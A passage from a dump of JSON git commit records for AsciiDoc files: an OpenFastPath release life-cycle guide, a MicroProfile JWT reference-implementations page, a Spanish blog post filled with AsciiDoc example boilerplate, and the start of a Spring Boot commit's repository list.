Release Notes are archived on the OFP Release Archive page\n <<relarch>>.\n\n* Release tag in the OFP repository <<repo>>, and all the content in\n the repository that the release tag points to.\n\n\n\n== Release Life Cycle\n\n* The stages of a release are:\n\n Development:: In this stage, new features are being developed and\n old features may be modified or even removed. The API, ABI and\n CLI may be unstable.\n\n Release Candidate:: Once all features have been implemented and\n API finalized, a feature freeze, which implies API, ABI and\n CLI freeze, may be initiated and the release moved to the\n release candidate stage. Release candidates are tagged. If\n issues are found, a correction is made and a new release\n candidate is tagged. Even though the API is frozen, bugs in\n the API may still be corrected in this stage. Once a release\n enters the Release Candidate stage, the next release enters\n Development stage.\n\n General Availability:: A release may enter this stage once the\n following criteria are met:\n\n *** All automated test cases pass.\n\n *** At least one week has passed since the last release\n candidate was tagged, and no issues requiring a correction\n have been found.\n\n *** All release content, listed in the\n <<_release_contents,Release Contents>> section, is\n available.\n\n End of Life:: A release enters End of Life stage once the next\n release enters General Availability stage. In the End of Life\n stage, no changes are made to the release and bug reports are\n not necessarily accepted anymore. Even if a bug report is\n accepted, the correction will only be done to the current\n release.\n\n* Only one release at a time is maintained (in General Availability\n stage).\n\n* General Availability stage lasts for at least five months.\n\n* OFP aims to adapt to new ODP releases within one month of the ODP\n release. This usually necessitates a new OFP release.\n\n* Stage transitions are communicated on the announcements page and\n mailing list at least one week beforehand, End of Life at least one\n month beforehand.\n\n* The decisions and approvals related to transitions between these\n stages are the responsibility of the TSC, based on the criteria\n above and inputs and comments from OFP members.\n\n\n\n== References\n\n[bibliography]\n\n* [[[ODPRG]]] ODP Release Guide.\n http:\/\/docs.opendataplane.org\/snapshots\/odp-publish\/generic\/usr_html\/latest\/master\/linux-generic\/output\/release-guide.html\n\n* [[[relarch]]] OFP Release Archive.\n http:\/\/www.openfastpath.org\/index.php\/service\/releasearchives\/\n\n* [[[repo]]] OFP Repository. 
https:\/\/github.com\/OpenFastPath\/ofp\n\n* [[[semver]]] Semantic Versioning 2.0.0.\n http:\/\/semver.org\/spec\/v2.0.0.html\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b2fad5ef41524a1e140d4945166e8b830a52dfba","subject":"update the reference implementations section","message":"update the reference implementations section\n\nSigned-off-by: Scott Stark <44b2f47f410f4bf6655e3ec1c92f766044282b1f@gmail.com>\n","repos":"MicroProfileJWT\/microprofile-jwt-auth,MicroProfileJWT\/microprofile-jwt-auth","old_file":"spec\/src\/main\/asciidoc\/refimpl.asciidoc","new_file":"spec\/src\/main\/asciidoc\/refimpl.asciidoc","new_contents":"\/\/\n\/\/ Copyright (c) 2016-2017 Eclipse Microprofile Contributors:\n\/\/ Red Hat\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\n\n## Reference Implementations\n\nThis section references known reference implementations of the Eclipse MicroProfile JWT RBAC authorization specification.\n\n### General Java EE\/SE based Implementations\n\nA baseline reference implementation that is available under the ASLv2 license\ncan be found at https:\/\/github.com\/starksm64\/microprofile-jwt-auth-ri. The purpose\nof this RI is to offer reusable code for integration of the JWT RBAC authentication\nand authorization spec in various container environments. This particular implementation contains:\n\n* a default implementation of the JWTPrincipal interface\n* a JAX-RS ContainerRequestFilter prototype\n* JSR-375 IdentityStore and Credential prototypes\n* TODO: a JSR-196 ServerAuthModule\n\n### Wildfly Swarm Implementations\n\nA reference implementation for a custom auth-method of MP-JWT with the Wildfly\/Wildfly-Swarm Undertow web container\navailable under the ASLv2 license can be found at https:\/\/github.com\/starksm64\/microprofile-jwt-auth-wfswarm.\n","old_contents":"\/\/\n\/\/ Copyright (c) 2016-2017 Eclipse Microprofile Contributors:\n\/\/ Red Hat\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\n\n## Reference Implementation\nA baseline reference implementation that is available under the ASLv2 license\ncan be found at https:\/\/github.com\/starksm64\/microprofile-jwt-auth-ri. 
The purpose\nof this RI is to offering reusable code for integration of the JWT RBAC authenticaiton\nand authorization in various container environments.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca0274ef8eb4d5221ac0410d47ae99e5ad4a11ea","subject":"Update 2015-02-10-Por-que-amo-lo-que-hago.adoc","message":"Update 2015-02-10-Por-que-amo-lo-que-hago.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-02-10-Por-que-amo-lo-que-hago.adoc","new_file":"_posts\/2015-02-10-Por-que-amo-lo-que-hago.adoc","new_contents":"= Por que amo lo que hago! \nJavier Le\u00f3n (@jelitox) <jel1284@gmail.com>\nv1.0, 2015-02-13\n:toc:\n:imagesdir: assets\/images\n:homepage: http:\/\/blog.javierleon.com.ve\n:hp-tags: Blog,Personal\n\/\/ Web page meta data.\n:keywords: Blog, Javier Le\u00f3n, IT, Devops, Desarrollo, Sysadmin, Social, Networks, emprendimiento, Pagina Oficial,\n:description: Blog personal y Profesional, +\nIngeniero en Informatica, desarrollador y Administrador de Sistemas e infraestructura, +\nRedes Sociales, facebook, instagram, twitter, pinterest +\nproyectos de emprendimiento Freenlance, +\nPagina principal.\n\n.{revdate}: {revnumber} \n*******************************************************************\n[quote, Steve jobs]\nTu trabajo va a llenar gran parte de tu vida, y la \u00fanica forma de estar realmente satisfecho con \u00e9l es hacer lo que creas que es un gran trabajo. Y la \u00fanica manera de hacer un trabajo genial es amar lo que haces. Si no lo has encontrado, sigue buscando. No te detengas. Al igual que con todos los asuntos del coraz\u00f3n, lo sabr\u00e1s cuando lo encuentres. Y, como cualquier gran relaci\u00f3n, s\u00f3lo se pondr\u00e1 mejor y mejor, conforme los a\u00f1os pasen. As\u00ed que sigue buscando hasta que lo encuentres. No te detengas.\n____\n\n*******************************************************************\nIntroduction\n------------\n{description}\n\nAsciiDoc is highly configurable: both the AsciiDoc source file syntax \nand the backend output markups (which can be almost any type of\nSGML\/XML markup) can be customized and extended by the user.\n\nAsciiDoc is free software and is licenced under the terms of the 'GNU\nGeneral Public License version 2' (GPLv2).\n\nTIP: The pages you are reading were written using AsciiDoc, to view\nthe corresponding AsciiDoc source click on the *Page Source* menu item\nin the left hand margin.\n\n\nOverview and Examples\n---------------------\nYou write an AsciiDoc document the same way you would write a\nnormal text document, there are no markup tags or weird format\nnotations. AsciiDoc files are designed to be viewed, edited and\nprinted directly or translated to other presentation formats using\nthe asciidoc(1) command.\n\nThe asciidoc(1) command translates AsciiDoc files to HTML, XHTML and\nDocBook markups. 
DocBook can be post-processed to presentation\nformats such as HTML, PDF, EPUB, DVI, LaTeX, roff, and Postscript\nusing readily available Open Source tools.\n\nExample Articles\n~~~~~~~~~~~~~~~~\n- This XHTML version of the\nlink:asciidoc.css-embedded.html[AsciiDoc User Guide]\nwas generated by AsciiDoc from\nlink:asciidoc.txt[this AsciiDoc file].\n\n- Here's the link:asciidoc.html[same document] created by first\ngenerating DocBook markup using AsciiDoc and then converting the\nDocBook markup to HTML using 'DocBook XSL Stylesheets'.\n\n- The User Guide again, this time a\nlink:chunked\/index.html[chunked version].\n\n- AsciiDoc generated this link:article-standalone.html[stand-alone\nHTML file] containing embedded CSS, JavaScript and images from this\nlink:article.txt[AsciiDoc article template] with this command:\n\nasciidoc -a data-uri -a icons -a toc -a max-width=55em article.txt\n\n- The same link:article.txt[AsciiDoc article template] generated\nlink:article-html5-toc2.html[this HTML 5] (the 'toc2' attribute puts\na table of contents in the left margin) from this command:\n\nasciidoc -b html5 -a icons -a toc2 -a theme=flask article.txt\n\n- The same link:article.txt[AsciiDoc article template] produced\nthis link:article.html[HTML file] and this\nlink:article.pdf[PDF file] via DocBook markup generated by AsciiDoc.\n\n[[X7]]\nExample Books\n~~~~~~~~~~~~~\nAsciiDoc markup supports all the standard DocBook frontmatter and\nbackmatter sections (dedication, preface, bibliography, glossary,\nindex, colophon) plus footnotes and index entries.\n\n- This link:book.txt[AsciiDoc book] produced link:book.html[this HTML\nfile] using the 'DocBook XSL Stylesheets'.\n- The link:asciidoc.pdf[PDF formatted AsciiDoc User Guide] was\ngenerated from asciidoc(1) DocBook output.\n- The link:asciidoc.epub[EPUB formatted AsciiDoc User Guide] was\ngenerated using link:a2x.1.html[a2x].\n- This link:book.epub[EPUB formatted book skeleton] was generated\nusing link:a2x.1.html[a2x].\n- This link:book-multi.txt[multi-part AsciiDoc book] produced\nlink:book-multi.html[this HTML file] using the 'DocBook XSL\nStylesheets'.\n\nExample UNIX Man Pages\n~~~~~~~~~~~~~~~~~~~~~~\nHTML formatted AsciiDoc man pages\nlink:asciidoc.1.css-embedded.html[with stylesheets] and\nlink:asciidoc.1.html[without stylesheets] were generated by AsciiDoc\nfrom link:asciidoc.1.txt[this file].\n\nThis link:asciidoc.1[roff formatted man page] was generated from\nasciidoc(1) DocBook output using `xsltproc(1)` and DocBook XSL\nStylesheets.\n\n[[X8]]\nExample Slideshows\n~~~~~~~~~~~~~~~~~~\nThe http:\/\/www.w3.org\/Talks\/Tools\/Slidy2\/[Slidy] backend generates\nHTML slideshows that can be viewed in any web browser. What's nice is\nthat you can create completely self contained slideshows including\nembedded images.\n\n- Here is the link:slidy.html[slidy backend documentation] slideshow\nand here is it's link:slidy.txt[AsciiDoc source].\n- An link:slidy-example.html[example slidy slideshow] and the\nlink:slidy-example.txt[AsciiDoc source].\n\nExample Web Site\n~~~~~~~~~~~~~~~~\nThe link:README-website.html[AsciiDoc website] is included in the\nAsciiDoc distribution (in `.\/examples\/website\/`) as an example website\nbuilt using AsciiDoc. See `.\/examples\/website\/README-website.txt`.\n","old_contents":"= Por que amo lo que hago! 
\nJavier Le\u00f3n (@jelitox) <jel1284@gmail.com>\nv1.0, 2015-02-13\n:toc:\n:imagesdir: assets\/images\n:homepage: http:\/\/blog.javierleon.com.ve\n:hp-tags: Blog,Personal\n\/\/ Web page meta data.\n:keywords: Blog, Javier Le\u00f3n, IT, Devops, Desarrollo, Sysadmin, Social, Networks, emprendimiento, Pagina Oficial,\n:description: Blog personal y Profesional, +\nIngeniero en Informatica, desarrollador y Administrador de Sistemas e infraestructura, +\nRedes Sociales, facebook, instagram, twitter, pinterest +\nproyectos de emprendimiento Freenlance, +\nPagina principal.\n\n.{revdate}: {revnumber} \n[quote, Steve jobs]\nTu trabajo va a llenar gran parte de tu vida, y la \u00fanica forma de estar realmente satisfecho con \u00e9l es hacer lo que creas que es un gran trabajo. Y la \u00fanica manera de hacer un trabajo genial es amar lo que haces. Si no lo has encontrado, sigue buscando. No te detengas. Al igual que con todos los asuntos del coraz\u00f3n, lo sabr\u00e1s cuando lo encuentres. Y, como cualquier gran relaci\u00f3n, s\u00f3lo se pondr\u00e1 mejor y mejor, conforme los a\u00f1os pasen. As\u00ed que sigue buscando hasta que lo encuentres. No te detengas.\n____\n\n*******************************************************************\nIntroduction\n------------\n{description}\n\nAsciiDoc is highly configurable: both the AsciiDoc source file syntax \nand the backend output markups (which can be almost any type of\nSGML\/XML markup) can be customized and extended by the user.\n\nAsciiDoc is free software and is licenced under the terms of the 'GNU\nGeneral Public License version 2' (GPLv2).\n\nTIP: The pages you are reading were written using AsciiDoc, to view\nthe corresponding AsciiDoc source click on the *Page Source* menu item\nin the left hand margin.\n\n\nOverview and Examples\n---------------------\nYou write an AsciiDoc document the same way you would write a\nnormal text document, there are no markup tags or weird format\nnotations. AsciiDoc files are designed to be viewed, edited and\nprinted directly or translated to other presentation formats using\nthe asciidoc(1) command.\n\nThe asciidoc(1) command translates AsciiDoc files to HTML, XHTML and\nDocBook markups. 
DocBook can be post-processed to presentation\nformats such as HTML, PDF, EPUB, DVI, LaTeX, roff, and Postscript\nusing readily available Open Source tools.\n\nExample Articles\n~~~~~~~~~~~~~~~~\n- This XHTML version of the\nlink:asciidoc.css-embedded.html[AsciiDoc User Guide]\nwas generated by AsciiDoc from\nlink:asciidoc.txt[this AsciiDoc file].\n\n- Here's the link:asciidoc.html[same document] created by first\ngenerating DocBook markup using AsciiDoc and then converting the\nDocBook markup to HTML using 'DocBook XSL Stylesheets'.\n\n- The User Guide again, this time a\nlink:chunked\/index.html[chunked version].\n\n- AsciiDoc generated this link:article-standalone.html[stand-alone\nHTML file] containing embedded CSS, JavaScript and images from this\nlink:article.txt[AsciiDoc article template] with this command:\n\nasciidoc -a data-uri -a icons -a toc -a max-width=55em article.txt\n\n- The same link:article.txt[AsciiDoc article template] generated\nlink:article-html5-toc2.html[this HTML 5] (the 'toc2' attribute puts\na table of contents in the left margin) from this command:\n\nasciidoc -b html5 -a icons -a toc2 -a theme=flask article.txt\n\n- The same link:article.txt[AsciiDoc article template] produced\nthis link:article.html[HTML file] and this\nlink:article.pdf[PDF file] via DocBook markup generated by AsciiDoc.\n\n[[X7]]\nExample Books\n~~~~~~~~~~~~~\nAsciiDoc markup supports all the standard DocBook frontmatter and\nbackmatter sections (dedication, preface, bibliography, glossary,\nindex, colophon) plus footnotes and index entries.\n\n- This link:book.txt[AsciiDoc book] produced link:book.html[this HTML\nfile] using the 'DocBook XSL Stylesheets'.\n- The link:asciidoc.pdf[PDF formatted AsciiDoc User Guide] was\ngenerated from asciidoc(1) DocBook output.\n- The link:asciidoc.epub[EPUB formatted AsciiDoc User Guide] was\ngenerated using link:a2x.1.html[a2x].\n- This link:book.epub[EPUB formatted book skeleton] was generated\nusing link:a2x.1.html[a2x].\n- This link:book-multi.txt[multi-part AsciiDoc book] produced\nlink:book-multi.html[this HTML file] using the 'DocBook XSL\nStylesheets'.\n\nExample UNIX Man Pages\n~~~~~~~~~~~~~~~~~~~~~~\nHTML formatted AsciiDoc man pages\nlink:asciidoc.1.css-embedded.html[with stylesheets] and\nlink:asciidoc.1.html[without stylesheets] were generated by AsciiDoc\nfrom link:asciidoc.1.txt[this file].\n\nThis link:asciidoc.1[roff formatted man page] was generated from\nasciidoc(1) DocBook output using `xsltproc(1)` and DocBook XSL\nStylesheets.\n\n[[X8]]\nExample Slideshows\n~~~~~~~~~~~~~~~~~~\nThe http:\/\/www.w3.org\/Talks\/Tools\/Slidy2\/[Slidy] backend generates\nHTML slideshows that can be viewed in any web browser. What's nice is\nthat you can create completely self contained slideshows including\nembedded images.\n\n- Here is the link:slidy.html[slidy backend documentation] slideshow\nand here is it's link:slidy.txt[AsciiDoc source].\n- An link:slidy-example.html[example slidy slideshow] and the\nlink:slidy-example.txt[AsciiDoc source].\n\nExample Web Site\n~~~~~~~~~~~~~~~~\nThe link:README-website.html[AsciiDoc website] is included in the\nAsciiDoc distribution (in `.\/examples\/website\/`) as an example website\nbuilt using AsciiDoc. 
See `.\/examples\/website\/README-website.txt`.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"a4e08beebcfc4c1eb0e41e4d53b28f67664706a0","subject":"Add missing variable to the example in the Loading YAML section","message":"Add missing variable to the example in the Loading YAML section\n\nCloses gh-1524\n","repos":"joansmith\/spring-boot,jrrickard\/spring-boot,ydsakyclguozi\/spring-boot,soul2zimate\/spring-boot,MasterRoots\/spring-boot,olivergierke\/spring-boot,nelswadycki\/spring-boot,xwjxwj30abc\/spring-boot,bjornlindstrom\/spring-boot,yuxiaole\/spring-boot,crackien\/spring-boot,javyzheng\/spring-boot,felipeg48\/spring-boot,drunklite\/spring-boot,dreis2211\/spring-boot,kdvolder\/spring-boot,Buzzardo\/spring-boot,AngusZhu\/spring-boot,mbnshankar\/spring-boot,mackeprm\/spring-boot,jxblum\/spring-boot,tan9\/spring-boot,meftaul\/spring-boot,nisuhw\/spring-boot,jforge\/spring-boot,RishikeshDarandale\/spring-boot,candrews\/spring-boot,rickeysu\/spring-boot,sbcoba\/spring-boot,ApiSecRay\/spring-boot,scottfrederick\/spring-boot,tan9\/spring-boot,jrrickard\/spring-boot,liupd\/spring-boot,Pokbab\/spring-boot,izestrea\/spring-boot,aahlenst\/spring-boot,nisuhw\/spring-boot,jmnarloch\/spring-boot,yunbian\/spring-boot,RichardCSantana\/spring-boot,duandf35\/spring-boot,mackeprm\/spring-boot,habuma\/spring-boot,SaravananParthasarathy\/SPSDemo,axelfontaine\/spring-boot,paweldolecinski\/spring-boot,RichardCSantana\/spring-boot,wwadge\/spring-boot,ptahchiev\/spring-boot,artembilan\/spring-boot,hqrt\/jenkins2-course-spring-boot,existmaster\/spring-boot,Xaerxess\/spring-boot,chrylis\/spring-boot,mbrukman\/spring-boot,AngusZhu\/spring-boot,auvik\/spring-boot,tsachev\/spring-boot,Pokbab\/spring-boot,bbrouwer\/spring-boot,tsachev\/spring-boot,gregturn\/spring-boot,mohican0607\/spring-boot,dfa1\/spring-boot,eddumelendez\/spring-boot,johnktims\/spring-boot,sebastiankirsch\/spring-boot,roberthafner\/spring-boot,vpavic\/spring-boot,lif123\/spring-boot,Makhlab\/spring-boot,srinivasan01\/spring-boot,tsachev\/spring-boot,lucassaldanha\/spring-boot,zorosteven\/spring-boot,smilence1986\/spring-boot,prakashme\/spring-boot,zhanhb\/spring-boot,bclozel\/spring-boot,qq83387856\/spring-boot,fulvio-m\/spring-boot,xingguang2013\/spring-boot,jcastaldoFoodEssentials\/spring-boot,htynkn\/spring-boot,mbogoevici\/spring-boot,na-na\/spring-boot,liupd\/spring-boot,nareshmiriyala\/spring-boot,jmnarloch\/spring-boot,mlc0202\/spring-boot,akmaharshi\/jenkins,jayeshmuralidharan\/spring-boot,mbogoevici\/spring-boot,jrrickard\/spring-boot,npcode\/spring-boot,tbbost\/spring-boot,lokbun\/spring-boot,vpavic\/spring-boot,ameraljovic\/spring-boot,sbuettner\/spring-boot,roymanish\/spring-boot,donhuvy\/spring-boot,mosoft521\/spring-boot,eliudiaz\/spring-boot,Nowheresly\/spring-boot,Chomeh\/spring-boot,ojacquemart\/spring-boot,jbovet\/spring-boot,fulvio-m\/spring-boot,roymanish\/spring-boot,htynkn\/spring-boot,orangesdk\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,166yuan\/spring-boot,deki\/spring-boot,neo4j-contrib\/spring-boot,xc145214\/spring-boot,xc145214\/spring-boot,hklv\/spring-boot,domix\/spring-boot,yunbian\/spring-boot,cbtpro\/spring-boot,10045125\/spring-boot,keithsjohnson\/spring-boot,peteyan\/spring-boot,snicoll\/spring-boot,krmcbride\/spring-boot,bbrouwer\/spring-boot,mbnshankar\/spring-boot,ihoneymon\/spring-boot,coolcao\/spring-boot,domix\/spring-boot,end-user\/spring-boot,vandan16\/Vandan,brettwooldridge\/spring-boot,rams2588\/spring-boot,fjlopez\/spring-boot,herau\/spring-boot,wilkinsona\/sp
ring-boot,vakninr\/spring-boot,afroje-reshma\/spring-boot-sample,frost2014\/spring-boot,AstaTus\/spring-boot,ojacquemart\/spring-boot,Makhlab\/spring-boot,jeremiahmarks\/spring-boot,xialeizhou\/spring-boot,vpavic\/spring-boot,playleud\/spring-boot,murilobr\/spring-boot,royclarkson\/spring-boot,existmaster\/spring-boot,zorosteven\/spring-boot,joansmith\/spring-boot,lucassaldanha\/spring-boot,javyzheng\/spring-boot,mrumpf\/spring-boot,gauravbrills\/spring-boot,gorcz\/spring-boot,jforge\/spring-boot,xialeizhou\/spring-boot,jjankar\/spring-boot,lburgazzoli\/spring-boot,shangyi0102\/spring-boot,brettwooldridge\/spring-boot,mbrukman\/spring-boot,kamilszymanski\/spring-boot,allyjunio\/spring-boot,ChunPIG\/spring-boot,166yuan\/spring-boot,xdweleven\/spring-boot,Makhlab\/spring-boot,mdeinum\/spring-boot,isopov\/spring-boot,jayeshmuralidharan\/spring-boot,srinivasan01\/spring-boot,AngusZhu\/spring-boot,fireshort\/spring-boot,gregturn\/spring-boot,rickeysu\/spring-boot,prakashme\/spring-boot,bclozel\/spring-boot,linead\/spring-boot,liupd\/spring-boot,lif123\/spring-boot,ameraljovic\/spring-boot,zhanhb\/spring-boot,chrylis\/spring-boot,designreuse\/spring-boot,NetoDevel\/spring-boot,michael-simons\/spring-boot,yhj630520\/spring-boot,paddymahoney\/spring-boot,mouadtk\/spring-boot,kiranbpatil\/spring-boot,srikalyan\/spring-boot,tiarebalbi\/spring-boot,hqrt\/jenkins2-course-spring-boot,Charkui\/spring-boot,spring-projects\/spring-boot,shakuzen\/spring-boot,damoyang\/spring-boot,lburgazzoli\/spring-boot,jorgepgjr\/spring-boot,Makhlab\/spring-boot,donhuvy\/spring-boot,donthadineshkumar\/spring-boot,hello2009chen\/spring-boot,wilkinsona\/spring-boot,candrews\/spring-boot,rickeysu\/spring-boot,MasterRoots\/spring-boot,lenicliu\/spring-boot,philwebb\/spring-boot-concourse,ameraljovic\/spring-boot,michael-simons\/spring-boot,yangdd1205\/spring-boot,AstaTus\/spring-boot,cleverjava\/jenkins2-course-spring-boot,DONIKAN\/spring-boot,dnsw83\/spring-boot,bjornlindstrom\/spring-boot,lokbun\/spring-boot,candrews\/spring-boot,domix\/spring-boot,tbbost\/spring-boot,nghiavo\/spring-boot,gorcz\/spring-boot,yhj630520\/spring-boot,srinivasan01\/spring-boot,neo4j-contrib\/spring-boot,thomasdarimont\/spring-boot,htynkn\/spring-boot,pnambiarsf\/spring-boot,tbadie\/spring-boot,ollie314\/spring-boot,mohican0607\/spring-boot,prasenjit-net\/spring-boot,tbbost\/spring-boot,javyzheng\/spring-boot,minmay\/spring-boot,simonnordberg\/spring-boot,zhanhb\/spring-boot,mlc0202\/spring-boot,mike-kukla\/spring-boot,dreis2211\/spring-boot,VitDevelop\/spring-boot,coolcao\/spring-boot,philwebb\/spring-boot-concourse,nisuhw\/spring-boot,keithsjohnson\/spring-boot,mouadtk\/spring-boot,zhangshuangquan\/spring-root,rajendra-chola\/jenkins2-course-spring-boot,paddymahoney\/spring-boot,durai145\/spring-boot,jxblum\/spring-boot,nurkiewicz\/spring-boot,master-slave\/spring-boot,sbuettner\/spring-boot,bclozel\/spring-boot,ptahchiev\/spring-boot,drumonii\/spring-boot,mouadtk\/spring-boot,habuma\/spring-boot,akmaharshi\/jenkins,MrMitchellMoore\/spring-boot,spring-projects\/spring-boot,panbiping\/spring-boot,panbiping\/spring-boot,dreis2211\/spring-boot,soul2zimate\/spring-boot,Chomeh\/spring-boot,nghialunhaiha\/spring-boot,keithsjohnson\/spring-boot,i007422\/jenkins2-course-spring-boot,chrylis\/spring-boot,mebinjacob\/spring-boot,meftaul\/spring-boot,nghialunhaiha\/spring-boot,designreuse\/spring-boot,eric-stanley\/spring-boot,krmcbride\/spring-boot,hello2009chen\/spring-boot,isopov\/spring-boot,dfa1\/spring-boot,qerub\/spring-boot,rweisleder\/spring-boot,
herau\/spring-boot,RobertNickens\/spring-boot,joansmith\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,balajinsr\/spring-boot,allyjunio\/spring-boot,nareshmiriyala\/spring-boot,mrumpf\/spring-boot,krmcbride\/spring-boot,RainPlanter\/spring-boot,damoyang\/spring-boot,okba1\/spring-boot,jmnarloch\/spring-boot,SPNilsen\/spring-boot,olivergierke\/spring-boot,mosoft521\/spring-boot,navarrogabriela\/spring-boot,AstaTus\/spring-boot,lucassaldanha\/spring-boot,bjornlindstrom\/spring-boot,domix\/spring-boot,marcellodesales\/spring-boot,vandan16\/Vandan,rams2588\/spring-boot,MasterRoots\/spring-boot,jorgepgjr\/spring-boot,duandf35\/spring-boot,balajinsr\/spring-boot,xwjxwj30abc\/spring-boot,christian-posta\/spring-boot,fogone\/spring-boot,herau\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,gauravbrills\/spring-boot,nareshmiriyala\/spring-boot,srikalyan\/spring-boot,fjlopez\/spring-boot,mlc0202\/spring-boot,smilence1986\/spring-boot,wwadge\/spring-boot,mdeinum\/spring-boot,habuma\/spring-boot,jayarampradhan\/spring-boot,ptahchiev\/spring-boot,domix\/spring-boot,lucassaldanha\/spring-boot,nevenc-pivotal\/spring-boot,axibase\/spring-boot,herau\/spring-boot,balajinsr\/spring-boot,lenicliu\/spring-boot,RichardCSantana\/spring-boot,NetoDevel\/spring-boot,ApiSecRay\/spring-boot,qerub\/spring-boot,vaseemahmed01\/spring-boot,prasenjit-net\/spring-boot,trecloux\/spring-boot,rams2588\/spring-boot,DONIKAN\/spring-boot,trecloux\/spring-boot,philwebb\/spring-boot,qerub\/spring-boot,gauravbrills\/spring-boot,cmsandiga\/spring-boot,Charkui\/spring-boot,vandan16\/Vandan,nelswadycki\/spring-boot,jjankar\/spring-boot,felipeg48\/spring-boot,yangdd1205\/spring-boot,philwebb\/spring-boot-concourse,rmoorman\/spring-boot,paddymahoney\/spring-boot,JiweiWong\/spring-boot,jack-luj\/spring-boot,ameraljovic\/spring-boot,ilayaperumalg\/spring-boot,sankin\/spring-boot,shakuzen\/spring-boot,nandakishorm\/spring-boot,imranansari\/spring-boot,lingounet\/spring-boot,marcellodesales\/spring-boot,SPNilsen\/spring-boot,joshiste\/spring-boot,patrikbeno\/spring-boot,huangyugui\/spring-boot,buobao\/spring-boot,scottfrederick\/spring-boot,ihoneymon\/spring-boot,izeye\/spring-boot,gorcz\/spring-boot,npcode\/spring-boot,bijukunjummen\/spring-boot,qerub\/spring-boot,aahlenst\/spring-boot,tan9\/spring-boot,RishikeshDarandale\/spring-boot,paweldolecinski\/spring-boot,ollie314\/spring-boot,duandf35\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,huangyugui\/spring-boot,mbenson\/spring-boot,ihoneymon\/spring-boot,krmcbride\/spring-boot,VitDevelop\/spring-boot,mbrukman\/spring-boot,afroje-reshma\/spring-boot-sample,jayarampradhan\/spring-boot,ralenmandao\/spring-boot,MasterRoots\/spring-boot,lexandro\/spring-boot,joshthornhill\/spring-boot,RainPlanter\/spring-boot,nareshmiriyala\/spring-boot,krmcbride\/spring-boot,jeremiahmarks\/spring-boot,sankin\/spring-boot,xc145214\/spring-boot,habuma\/spring-boot,clarklj001\/spring-boot,zhangshuangquan\/spring-root,nurkiewicz\/spring-boot,hklv\/spring-boot,nandakishorm\/spring-boot,pnambiarsf\/spring-boot,mike-kukla\/spring-boot,mabernardo\/spring-boot,mrumpf\/spring-boot,Xaerxess\/spring-boot,ollie314\/spring-boot,panbiping\/spring-boot,candrews\/spring-boot,sebastiankirsch\/spring-boot,fogone\/spring-boot,gauravbrills\/spring-boot,lenicliu\/spring-boot,fjlopez\/spring-boot,ihoneymon\/spring-boot,imranansari\/spring-boot,felipeg48\/spring-boot,nebhale\/spring-boot,wilkinsona\/spring-boot,imranansari\/spring-boot,Pokbab\/spring-boot,SPNilsen\/spring-boot,meftaul\/spring-boot,jos
hthornhill\/spring-boot,lburgazzoli\/spring-boot,thomasdarimont\/spring-boot,pvorb\/spring-boot,donthadineshkumar\/spring-boot,nevenc-pivotal\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,nelswadycki\/spring-boot,ojacquemart\/spring-boot,shangyi0102\/spring-boot,end-user\/spring-boot,ralenmandao\/spring-boot,mosoft521\/spring-boot,10045125\/spring-boot,RobertNickens\/spring-boot,qq83387856\/spring-boot,frost2014\/spring-boot,rickeysu\/spring-boot,liupugong\/spring-boot,end-user\/spring-boot,rstirling\/spring-boot,M3lkior\/spring-boot,lexandro\/spring-boot,simonnordberg\/spring-boot,sungha\/spring-boot,mabernardo\/spring-boot,i007422\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,mdeinum\/spring-boot,scottfrederick\/spring-boot,jmnarloch\/spring-boot,Nowheresly\/spring-boot,soul2zimate\/spring-boot,VitDevelop\/spring-boot,frost2014\/spring-boot,cmsandiga\/spring-boot,huangyugui\/spring-boot,olivergierke\/spring-boot,rizwan18\/spring-boot,tiarebalbi\/spring-boot,jeremiahmarks\/spring-boot,AngusZhu\/spring-boot,bbrouwer\/spring-boot,joshiste\/spring-boot,michael-simons\/spring-boot,christian-posta\/spring-boot,ChunPIG\/spring-boot,kayelau\/spring-boot,eonezhang\/spring-boot,mouadtk\/spring-boot,Buzzardo\/spring-boot,joansmith\/spring-boot,drumonii\/spring-boot,royclarkson\/spring-boot,satheeshmb\/spring-boot,imranansari\/spring-boot,philwebb\/spring-boot,mbenson\/spring-boot,SPNilsen\/spring-boot,jbovet\/spring-boot,nurkiewicz\/spring-boot,RobertNickens\/spring-boot,nebhale\/spring-boot,balajinsr\/spring-boot,jack-luj\/spring-boot,ptahchiev\/spring-boot,buobao\/spring-boot,htynkn\/spring-boot,jayeshmuralidharan\/spring-boot,prakashme\/spring-boot,rizwan18\/spring-boot,dfa1\/spring-boot,fogone\/spring-boot,ractive\/spring-boot,clarklj001\/spring-boot,jrrickard\/spring-boot,nevenc-pivotal\/spring-boot,axelfontaine\/spring-boot,huangyugui\/spring-boot,joshiste\/spring-boot,5zzang\/spring-boot,PraveenkumarShethe\/spring-boot,Charkui\/spring-boot,tan9\/spring-boot,meloncocoo\/spring-boot,zhangshuangquan\/spring-root,end-user\/spring-boot,orangesdk\/spring-boot,forestqqqq\/spring-boot,eddumelendez\/spring-b